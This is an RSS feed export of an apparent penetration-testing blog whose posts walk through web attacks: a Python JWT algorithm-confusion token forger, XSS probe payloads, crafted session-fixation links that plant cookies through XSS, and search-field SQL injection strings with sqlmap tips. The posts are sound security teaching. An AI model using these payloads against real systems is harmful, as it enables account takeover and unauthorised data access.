<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Explore Security &#187; web apps</title>
	<atom:link href="https://www.exploresecurity.com/tag/web-apps/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.exploresecurity.com</link>
	<description>IT security tools, techniques and commentary</description>
	<lastBuildDate>Wed, 15 Jun 2022 09:21:02 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.6.1</generator>
		<item>
		<title>JWT Attack Walk-Through</title>
		<link>https://www.exploresecurity.com/jwt-attack-walk-through/</link>
		<comments>https://www.exploresecurity.com/jwt-attack-walk-through/#comments</comments>
		<pubDate>Fri, 25 Jan 2019 10:13:31 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[JWT]]></category>
		<category><![CDATA[OpenSSL]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=455</guid>
		<description><![CDATA[Over on the NCC Group website I published a solution to an open demonstration of the well-known JSON Web Token (JWT) algorithm confusion vulnerability (the one where you swap the token algorithm from &#8216;RS&#8217; to &#8216;HS&#8217; and sign your payload with the public key). I use OpenSSL to gain full visibility of what&#8217;s happening and, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Over on the NCC Group website I <a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/january/jwt-attack-walk-through/">published</a> a solution to an open demonstration of the well-known JSON Web Token (JWT) algorithm confusion vulnerability (the one where you swap the token algorithm from &#8216;RS&#8217; to &#8216;HS&#8217; and sign your payload with the <em>public</em> key). I use OpenSSL to gain full visibility of what&#8217;s happening and, by walking through the method, if you ever need to test this vulnerability yourself, it will hopefully help to avoid false negatives.</p>
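<p>The core of the confusion attack can be sketched in a few lines of Python: the header algorithm is swapped to HS256 and the token is HMAC-signed with the server&#8217;s <em>public</em> key as the secret. The payload claims and key material below are placeholders for illustration; the linked walk-through shows how to extract the real public key with OpenSSL.</p>

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    # JWTs use unpadded base64url encoding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_hs256(payload: dict, public_key_pem: bytes) -> str:
    # Swap the algorithm from RS256 to HS256...
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    # ...and sign with the *public* key bytes as the HMAC secret.
    sig = hmac.new(public_key_pem, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

# Hypothetical claims and key, purely for illustration
token = forge_hs256({"user": "admin"}, b"-----BEGIN PUBLIC KEY-----\n...")
```

<p>A vulnerable verifier that trusts the header&#8217;s <code>alg</code> field will validate this token with the same public key it would otherwise use for RSA verification.</p>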
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/jwt-attack-walk-through/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Missing XSS flaws with innerHTML and jQuery</title>
		<link>https://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/</link>
		<comments>https://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/#comments</comments>
		<pubDate>Wed, 28 Mar 2018 15:11:42 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[jQuery]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=440</guid>
		<description><![CDATA[I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind. [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind.<span id="more-440"></span></p>
<p>These days a typical web app pulls in data from background XHR requests, the responses come back in a data format like JSON, and the data is parsed client-side and inserted into the DOM of the page. This means, of course, that the encoding of the data in the response is not sufficient by itself to know whether there’s a potential XSS risk – it depends how the data is finally encoded when inserted into the page. But consider the following:</p>
<ol>
<li>You enter <code>&lt;script&gt;alert(1)&lt;/script&gt;</code> hoping for a quick and dirty win – nothing</li>
<li>You suspect input validation so you enter something that you hope will pass validation but test encoding, e.g. <code>xss &lt; &gt; test</code></li>
<li>You inspect the page using the browser dev tools and see it has been inserted as <code>xss &amp;lt; &amp;gt; test</code></li>
<li>So the encoding looks good, and you move on &#8211;</li>
</ol>
<p>But wait! Even dangerous DOM manipulation can perform encoding in a text context. For example, <code>innerHTML</code> will observe the <a href="https://w3c.github.io/DOM-Parsing/#xml-serializing-a-text-node">rules</a> and, in a text context, will encode <code>&lt;</code> as <code>&amp;lt;</code> and <code>&gt;</code> as <code>&amp;gt;</code> (and <code>&amp;</code> as <code>&amp;amp;</code> in fact), otherwise those characters are inserted/parsed literally. So the encoding seen in step 3 could be explained by this, meaning that the potential for XSS still exists. It’s precisely because jQuery uses <code>innerHTML</code> as part of functions like <a href="http://api.jquery.com/append/"><em>append()</em></a> that the documentation is full of caveats about not using data from &#8220;untrusted sources&#8221;.</p>
<p>Let’s assume the developers haven’t thought about XSS at all. So why did step 1 fail? This is because the <a href="https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerhtml0">spec</a> says &#8220;script elements inserted using <code>innerHTML</code> do not execute when they are inserted&#8221;. If the first test case had been <code>&lt;img src=x onerror=alert(1)&gt;</code> the XSS would have been revealed in step 1.</p>
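<p>The ambiguity in step 3 is easy to see side by side: a safe server-side HTML encode and <code>innerHTML</code>&#8217;s text-node serialisation produce identical characters for <code>&lt;</code>, <code>&gt;</code> and <code>&amp;</code>. A quick Python illustration (here <code>html.escape</code> stands in for the server, and a plain string replace mimics the serialisation rules &#8211; neither is a real DOM):</p>

```python
from html import escape

probe = "xss < > test"

# What you'd see in dev tools after a safe server-side encode...
server_encoded = escape(probe, quote=False)

# ...is indistinguishable from innerHTML's text-node serialisation,
# which encodes & < > in a text context (rough stand-in for the spec).
innerhtml_like = probe.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")

assert server_encoded == innerhtml_like  # both: "xss &lt; &gt; test"
```

<p>So seeing <code>xss &amp;lt; &amp;gt; test</code> in the DOM tells you nothing about <em>where</em> the encoding happened, which is the whole point of the gotcha.</p>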
<p>Hope that’s of some use!</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>When HTML Encoding Helped XSS</title>
		<link>https://www.exploresecurity.com/when-html-encoding-helped-xss/</link>
		<comments>https://www.exploresecurity.com/when-html-encoding-helped-xss/#comments</comments>
		<pubDate>Fri, 30 Jan 2015 10:19:17 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=342</guid>
		<description><![CDATA[Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I previously explained and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I <a href="http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/">previously explained</a> and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a working XSS payload!<span id="more-342"></span></p>
<h3>The problem</h3>
<p>The application used a bespoke session management cookie. I&#8217;ll call it MYSESSIONID. On login, it wasn&#8217;t renewed. I couldn&#8217;t push a session cookie onto the victim in a classic session fixation attack. However, I had XSS in an unauthenticated page &#8211; but not the login page. The filtering in place used a combination of removal and encoding. Characters that were stripped out included:</p>
<p><code>+ ; ( ) ? &lt; &gt;</code></p>
<p>Characters that were allowed included:</p>
<p><code>" ' = [ ] / , .</code></p>
<p>So even though MYSESSIONID wasn&#8217;t protected with the <em>HttpOnly</em> flag, I just couldn&#8217;t construct a payload to steal it. Instead I looked to set one of my own. Here&#8217;s a breakdown of the attack:</p>
<h3>1. Get a valid cookie</h3>
<p>The application did not accept arbitrary session management cookies so the attacker sends a request to get a valid one. In this case, simply having no MYSESSIONID wasn&#8217;t enough, the cookie had to be present but an invalid value did the trick:</p>
<p><code>Cookie: MYSESSIONID=aaaaaaaaaaaaaaaaaaa:xx01</code></p>
<p>returned</p>
<p><code>Set-Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01; Path=/; Domain=.example.com</code></p>
<h3>2. The XSS</h3>
<p>The malicious link looked something like this (the highlighted bits are explained below):</p>
<p><code>https://www.example.com/app/folder/page?vuln=foo"<span style="color: red;">%0a</span>document.cookie%3d"MYSESSIONID%3dNDnQrZ6JsMHyJTBCw8n:xx01<span style="color: blue;">:%0d</span><span style="color: red;">path%3d/app/</span></code></p>
<p>When clicked, the XSS flaw wrote the following to the return page inside a JavaScript code block:</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/";</code></p>
<p>The <span style="color: red;">%0a</span> at the front of the XSS payload was used to start a new line and this was sufficient to act as a statement terminator after <code>var a = "foo"</code> (semi-colons were being stripped). But in order to inject a <code>path</code> attribute (discussed below) I did need a semi-colon in the cookie string. By running every character through a Burp Intruder attack, I saw which characters were allowed, which were stripped and which were returned encoded. By inserting <span style="color: blue;">:%0d</span> into the XSS payload :&amp;#13; was returned &#8211; yes, %0d was encoded but %0a (used above) came back fine! Being inside a string inside a JavaScript block &amp;#13; wasn&#8217;t seen as an HTML entity by the browser and thus wasn&#8217;t interpreted. This provided the semi-colon needed to create a <code>path</code> attribute.</p>
<p>The colon at the front was used because it looked like the session cookie was delimited in that way. That &#8220;xx01&#8221; might refer, for example, to an internal server for load-balancing. Anyway, whatever it did, the application tolerated the unusual suffix to the session cookie. So that explains the :%0d appended to the cookie value in the XSS payload. Now for the <code><span style="color: red;">path%3d/app/</span></code>&#8230;</p>
<h3>3. The victim logs in</h3>
<p>So, at this point, the attacker has set the MYSESSIONID cookie on the victim to be <code>NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13</code> via a reflected XSS attack. Now the victim goes to the login page at https://www.example.com/app/login or is bounced there by navigating to a part of the site that enforces authentication. At login two MYSESSIONID cookies are passed up. This is because one had been set earlier in a <code>Set-Cookie</code> response header the first time the victim hit the site, even if that was by visiting the XSS&#8217;ed page. The genuine MYSESSIONID has a <code>path</code> of / and a <code>domain</code> of .example.com. If I had set a cookie by XSS with no attributes my cookie would have had a <code>path</code> of /app/folder/ (to match the path of the page which set the cookie) and a <code>domain</code> of www.example.com (to match the domain of said page). This would mean my cookie would never be sent up to /app/login for authentication, hence the need to set a <code>path</code> as part of the XSS.</p>
<p>Furthermore, when two MYSESSIONID values were sent up, the application took the first value so I had to make sure my cookie was first. By setting a <code>path</code> of /app/, it trumped the real MYSESSIONID for having a better path match to /app/login. Thus it was listed first in the POST request with the credentials and became authenticated:</p>
<p><code>Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13; MYSESSIONID=4GRc4jiKNeQIfsqh2:xx01</code></p>
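<p>The ordering that makes this work follows RFC 6265, which says cookies with longer (more specific) paths are listed first in the <code>Cookie</code> header. A minimal sketch of that sorting rule (ignoring the creation-time tie-breaker):</p>

```python
def cookie_header(cookies):
    # RFC 6265 s5.4: cookies with longer paths are listed first;
    # creation time breaks ties (ignored in this sketch).
    ordered = sorted(cookies, key=lambda c: -len(c["path"]))
    return "; ".join(f'{c["name"]}={c["value"]}' for c in ordered)

cookies = [
    # genuine, server-set cookie
    {"name": "MYSESSIONID", "value": "4GRc4jiKNeQIfsqh2:xx01", "path": "/"},
    # attacker's cookie, fixed via XSS with the injected path
    {"name": "MYSESSIONID", "value": "NDnQrZ6JsMHyJTBCw8n:xx01:&#13", "path": "/app/"},
]
header = cookie_header(cookies)
# The attacker's /app/ cookie precedes the genuine / cookie:
assert header.startswith("MYSESSIONID=NDnQrZ6JsMHyJTBCw8n")
```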
<p>In contrast, the <code>domain</code> of a cookie does not govern precedence in a standardised way; it varies between browsers. From memory I think my cookie (with a more specific domain match) was sent up first by IE but second by Chrome and Firefox. It&#8217;s not something you want to rely on. Neither could I overwrite the cookie, because for that to happen the name, path and domain must all match. That would mean having to change both attributes from their defaults, but in this case I could only change one. This is because I&#8217;d need a second semi-colon to set a second attribute and, in doing so, using the encoding trick above, the first attribute would be spoilt, e.g. I&#8217;d get</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/<span style="color: red;">&amp;#13</span>;domain=.example.com";</code></p>
<p>Developing this proof-of-concept for this specific injection point was quite fiddly and took some persistence but it was worth it. For all of their filtering &#8211; and because they did not change the session cookie after authentication &#8211; this was a nice practical attack using an unauthenticated XSS. One take-away thought then: be sure to probe the XSS defences in full because you never know what might come back and how it could be of help!</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/when-html-encoding-helped-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>SQL Injection in Search Fields</title>
		<link>https://www.exploresecurity.com/sql-injection-in-search-fields/</link>
		<comments>https://www.exploresecurity.com/sql-injection-in-search-fields/#comments</comments>
		<pubDate>Thu, 25 Sep 2014 22:07:40 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=234</guid>
		<description><![CDATA[A quick posting about a fun SQL injection I cracked last week (of course, it&#8217;s only when you&#8217;ve cracked them that they&#8217;re fun!). A colleague had found the classic sign of a problem &#8211; add a single quote and you get an error &#8211; but was having no luck doing anything more. I was getting [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>A quick posting about a fun SQL injection I cracked last week (of course, it&#8217;s only when you&#8217;ve cracked them that they&#8217;re fun!). A colleague had found the classic sign of a problem &#8211; add a single quote and you get an error &#8211; but was having no luck doing anything more. I was getting nowhere with my test so I thought I&#8217;d take a look for a change of scene. The input field was in a search box so, for example, <code>search=keyword'</code> returned an error but <code>search=keyword''</code> was fine. Anything more exciting than that, however, such as <code>search=keyword' and '1'='1</code>, didn&#8217;t seem to work as expected: in this case, an error was returned instead of the same set of results that the normal <code>search=keyword</code> produced.<span id="more-234"></span></p>
<p>The first thing I did was to try to terminate the query as simply as possible with no funny business. So in went <code>search=keyword'--</code> but back came an error. It turned out that the injection point was inside a doubly nested query as <code>search=keyword'))--</code> worked, producing the same results as <code>search=keyword</code>. After a bit of faffing about it occurred to me that spaces might be the issue. So I tried <code>search=keyword'and'1'='1</code> (no spaces in there) and it worked! No error was returned &#8211; but it didn&#8217;t produce the same results as <code>search=keyword</code>, it returned no results at all. What produced the same results as <code>search=keyword</code> was <code>search=keyword'or'1'='1</code>. Okay, park that for now. I had found the main problem &#8211; and it was immediately clear what was going on.</p>
<p>With a developer&#8217;s hat on, what would you do if a user ran a search with multiple keywords? The obvious answer would be to split up the search terms with space as a delimiter, run a query on each one and then return all the results together. If that was true then <code>search=keyword' and '1'='1</code> was running a database query against three terms: <code>keyword'</code>, <code>and</code>, <code>'1'='1</code>. The first of these would fail (just like <code>search=keyword'</code> did), as would the last if it got that far. So next I tried <code>search=keyword'/**/and/**/'1'='1</code> using the inline SQL comment characters and got the same result. Again, using AND returned no results but using OR was like a normal query with <code>search=keyword</code>. I had seen this kind of behaviour once before but I couldn&#8217;t remember what the context was, which is why I&#8217;ve written it down this time!</p>
<h3>AND vs OR</h3>
<p>In general, AND within a SQL statement (and thus in SQL injection too) is restrictive, narrowing the result set, whereas OR is inclusive, widening the result set. But, as with all SQL injection, it all depends on the underlying query. So what could be happening here?</p>
<p>Again, with the developer hat on, what else might you do with a user&#8217;s search terms? Well, it would be nice if you searched a little more widely, using them as stubs. In fact some of the SQL errors were giving this away (thanks, guys): <em>Incorrect syntax near &#8216;%&#8217;</em>. The % character is, of course, a wildcard used with LIKE. So when I searched for <code>keyword</code>, somewhere in the resulting query was <code>LIKE '%keyword%'</code>. This perfectly explains the AND vs OR behaviour&#8230;</p>
<p>When I injected <code>search=keyword'and'1'='1</code> the resulting query included <code>LIKE '%keyword'and'1'='1%'</code>. So the AND clause I&#8217;d added was always evaluating to FALSE and hence no results were returned. Whereas injecting <code>search=keyword'or'1'='1</code> produced <code>LIKE '%keyword'or'1'='1%'</code>. Even though one half of the OR clause was evaluating to FALSE, overall it returned TRUE when I got a positive hit on the keyword.</p>
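<p>The AND vs OR behaviour is easy to reproduce with an in-memory SQLite table. The table and column names here are invented, but the <code>LIKE '%&#8230;%'</code> pattern is exactly the shape the injections above would build (note the injected quote means the effective match becomes an ends-with <code>'%keyword'</code> rather than the original contains-match):</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (name TEXT)")
conn.execute("INSERT INTO products VALUES ('ends with keyword'), ('other')")

def search(injected: str):
    # The application effectively built: ... LIKE '%<input>%'
    sql = f"SELECT name FROM products WHERE name LIKE '%{injected}%'"
    return conn.execute(sql).fetchall()

# LIKE '%keyword' AND '1'='1%'  -> the AND clause is always FALSE
assert search("keyword'and'1'='1") == []
# LIKE '%keyword' OR '1'='1%'   -> TRUE on a positive keyword hit
assert search("keyword'or'1'='1") == [("ends with keyword",)]
# LIKE '%keyword' AND '1%'='1%' -> the trailing %' now closes the
# comparison string, so the AND clause is TRUE
assert search("keyword'and'1%'='1") == [("ends with keyword",)]
```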
<p>Since the injection point was inside a doubly nested query and this was a black box test, I had no idea what the real query was, but this certainly made sense. I tried a few more injections to test the theory just for the hell of it:</p>
<ol>
<li>When I terminated the statement, AND and OR did their &#8220;usual&#8221; thing. Which is to say that <code>search=keyword'/**/and/**/1=1))--</code> produced the same result as <code>search=keyword</code> whereas <code>search=keyword'/**/or/**/1=1))--</code> produced lots of results. This is because I was now commenting out the final % along with the rest of the statement.</li>
<li>When I injected <code>search=keyword'and'1%'='1</code> I got the same results as if there had been no injection. This was the real proof. Now the resulting query would have included <code>LIKE '%keyword'and'1%'='1%'</code> so my AND clause evaluated to TRUE when I got a positive hit on the keyword.</li>
<li>Finally, for what it was worth, <code>search=word'and'1%'='1</code> produced the same result, showing that a % preceded the injection point.</li>
</ol>
<h3>sqlmap</h3>
<p>One of the things that makes a great tool is the ability to customise it for a particular attack scenario. And sqlmap offers that in abundance. In this case a &#8220;tamper&#8221; script, which transforms the payloads in some way, worked a treat. One of the built-in tamper scripts is &#8220;space2comment&#8221; &#8211; bingo! In fact running sqlmap with this script allowed it to find the injection point. Without the script, though, sqlmap would have been stuck because, to quote the <a href='https://github.com/sqlmapproject/sqlmap/wiki/Usage#tamper-injection-data'>wiki page</a>, &#8220;sqlmap itself does no obfuscation of the payload sent, except for strings between single quotes replaced by their CHAR()-alike representation&#8221;.</p>
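<p>The idea behind space2comment is a one-line transformation. The sketch below is a naive version for illustration &#8211; the real sqlmap script is more careful (it tracks quoted strings, for instance) &#8211; but it produces exactly the payload shape used above:</p>

```python
def space2comment(payload: str) -> str:
    # Naive take on the idea behind sqlmap's space2comment tamper
    # script: swap spaces for inline SQL comments.
    return payload.replace(" ", "/**/")

forged = space2comment("keyword' and '1'='1")
assert forged == "keyword'/**/and/**/'1'='1"
```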
<p>All this was a good reminder that, when things are getting tough, thinking like a developer can help to turn near-misses into exploitable flaws. Having said that, I&#8217;ve seen code in the past that I could never have guessed, when it was clear the developer wasn&#8217;t thinking at all!</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/sql-injection-in-search-fields/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Session Fixation and XSS Working Hand-in-Hand</title>
		<link>https://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/</link>
		<comments>https://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/#comments</comments>
		<pubDate>Sat, 06 Sep 2014 22:05:41 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[Cookies]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=212</guid>
		<description><![CDATA[Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such scenario because usually a few requirements must be met for the attack to work. I thought I&#8217;d write up a recent session fixation flaw because the act of forcing the cookie onto the victim involved a little twist on overwriting session cookies that made a reflective XSS attack last a lot longer while also laughing in the face of <code>httponly</code>.<span id="more-212"></span></p>
<p>As long as an attacker can remotely force the victim to use a known session cookie that becomes authenticated, you&#8217;ve found session fixation, but it&#8217;s one of those flaws that can be achieved in multiple ways that are subtly different from one another. In this particular instance the session fixation attack ran like this:</p>
<h3>1. The attacker makes up a session cookie</h3>
<p>Yes, the application accepted client-generated cookies.</p>
<h3>2. The attacker makes a specific request using the fabricated cookie</h3>
<p>This was a bit odd but if the session cookie from a request was not recognised by the application (whether it was made up or, more usually, it had just been set by the previous response page) then a background XHR request was made that effectively &#8220;authorised&#8221; the cookie. Okay, whatever, so the attacker does this.</p>
<h3>3. The login page suffered from XSS so the attacker crafts a malicious link to set the known cookie on the victim.</h3>
<p>The malicious link was something like this (I&#8217;ve removed the URL-encoding to make it easier to read):</p>
<p style="padding-left: 30px;"><code>https://www.example.com/login?param="&gt;&lt;script&gt;document.cookie="PHPSESSID=attackerCookie; path=/login; expires=Tue, 06-Aug-2024 00:00:01 GMT"&lt;/script&gt;</code></p>
<p>In more &#8220;traditional&#8221; session fixation the attacker&#8217;s cookie is a parameter in the request that the attacker tricks the victim into making, so using XSS seems a bit like cheating. Unfortunately (for me) the application didn&#8217;t accept a session cookie in the &#8220;traditional&#8221; way and XSS was my only option. OWASP does credit XSS in its description of <a href="https://www.owasp.org/index.php/Session_fixation">session fixation</a> but, that aside, not only did XSS help the session fixation attack but the session fixation flaw helped the XSS attack&#8230; One reason for this was that a simple <code>document.cookie</code> session hijack through XSS was restricted by the response to the above request:</p>
<p style="padding-left: 30px;"><code>Set-Cookie: PHPSESSID=serverCookie; path=/; secure; HttpOnly</code></p>
<p>Because of the <code>httponly</code> flag, the XSS payload could not pull out the session cookie and send it to the attacker. Of course, many other interesting XSS options are still possible, such as rewriting the form&#8217;s <code>action</code> attribute so that the login credentials would be sent to the attacker. However, one advantage of the session fixation approach (apart from the interest of seeing it working) is that <em>nothing</em> is sent to the attacker. Furthermore, as I&#8217;ll explain later (and you may have already spotted from the XSS payload) this attack has the potential to be more long-term than knowing the username and password.</p>
<p>The <code>httponly</code> flag has another effect: the XSS payload can neither read the cookie nor overwrite it. This behaviour isn&#8217;t standardised; it&#8217;s one of those grey areas that Michal Zalewski covers <a href="https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies">so</a> <a href="http://lcamtuf.coredump.cx/tangled/">well</a> but in this case it&#8217;s not so grey. IE 10, Chrome 37 and Firefox 30 all behaved in the same way. But you might have noticed that the XSS payload included a <code>path</code> of /login when it set the session cookie. This is where the attacker wins as now the browser doesn&#8217;t see this as an overwrite but as a different cookie altogether&#8230;</p>
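<p>The &#8220;different cookie altogether&#8221; point can be sketched with a toy cookie jar: browsers key cookies on the (name, domain, path) triple, so a script-set cookie at <code>path=/login</code> never collides with the <code>HttpOnly</code> cookie at <code>path=/</code> and no overwrite check is triggered. This jar is an illustration of the rule, not any browser&#8217;s actual implementation:</p>

```python
jar = {}

def set_cookie(name, value, domain, path, httponly=False, via_script=False):
    key = (name, domain, path)  # browsers key cookies on this triple
    if via_script and key in jar and jar[key]["httponly"]:
        return False  # a script may not overwrite an HttpOnly cookie
    jar[key] = {"value": value, "httponly": httponly and not via_script}
    return True

# Server sets the real session cookie with HttpOnly at path=/
set_cookie("PHPSESSID", "serverCookie", ".example.com", "/", httponly=True)
# Script can't overwrite it at the same path...
assert not set_cookie("PHPSESSID", "evil", ".example.com", "/", via_script=True)
# ...but a different path is a different cookie, so it succeeds
assert set_cookie("PHPSESSID", "attackerCookie", ".example.com", "/login", via_script=True)
# Two PHPSESSID cookies now coexist in the jar
assert len([k for k in jar if k[0] == "PHPSESSID"]) == 2
```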
<h3>4. The victim logs in and the session cookie becomes authenticated</h3>
<p>The server-generated session cookie included a <code>path=/</code> directive so when the victim logs in to /login the attacker&#8217;s cookie has precedence (in that it&#8217;s listed first) because the path is a more specific match to the target page:</p>
<p style="padding-left: 30px;"><code>Cookie: PHPSESSID=attackerCookie; PHPSESSID=serverCookie</code></p>
<p>The application processed the first cookie with the login, thus the attacker&#8217;s fabricated cookie became authenticated and was associated with the victim&#8217;s account. Of course if the session cookie had been changed after authentication, which is best practice, the attack would have failed. Note that the attacker can also set the <code>domain</code> attribute of the cookie to .example.com to try to widen the impact of the attack.</p>
<h3>5. The attacker uses the known session cookie to masquerade as the victim</h3>
<p>The last thing to mention is the long-term nature of this attack. Although logging off did detach the session cookie from the victim&#8217;s account, leaving it unauthenticated, the application did not clear it (again, best practice). So the next time the website is visited, the attacker&#8217;s session cookie will again be offered, accepted and authenticated. Because the XSS payload effectively makes the cookie permanent by setting a long expiry date, the attacker has access to the account of anyone that logs in using the compromised browser in the future. Of course, the persistence of the attack dies as soon as the browser&#8217;s cookie cache is cleared &#8211; but how often does that happen? For what is, after all, a <em>reflected</em> XSS attack, you&#8217;d be certain to get a good return. Indeed, if the browser is shared among users (e.g. at home or at internet kiosks), a single XSS attack can exploit multiple users of the website, making it a one-to-many attack, which you don&#8217;t tend to associate with reflective XSS.</p>
<p>I&#8217;m not claiming any of this is particularly novel, by the way. I just enjoyed finding the XSS path trick for myself and using it with session fixation to poke fun at <code>httponly</code> and to create a more persistent version of a reflective XSS attack. It also demonstrated that best practice points, although seemingly trivial when taken alone, can help to stop or mitigate more complex attacks.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Three Cheers for DirBuster</title>
		<link>https://www.exploresecurity.com/three-cheers-for-dirbuster/</link>
		<comments>https://www.exploresecurity.com/three-cheers-for-dirbuster/#comments</comments>
		<pubDate>Fri, 04 Jul 2014 09:29:23 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[DirBuster]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=183</guid>
		<description><![CDATA[Not exactly wizard stuff today, more like back to basics perhaps &#8211; but sometimes they&#8217;re worth revisiting. I&#8217;ve had some good DirBuster finds three tests in a row so I thought I&#8217;d write them up as a case study. It&#8217;s a reminder that there&#8217;s some very low-hanging fruit out there that may not always get [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Not exactly wizard stuff today, more like back to basics perhaps &#8211; but sometimes they&#8217;re worth revisiting. I&#8217;ve had some good DirBuster finds three tests in a row so I thought I&#8217;d write them up as a case study. It&#8217;s a reminder that there&#8217;s some very low-hanging fruit out there that may not always get picked. I&#8217;ve also put together a walk-through for many of DirBuster&#8217;s features and I aim to show that, as with many tools, a few minutes of manual work can produce a faster set of more meaningful results.<span id="more-183"></span></p>
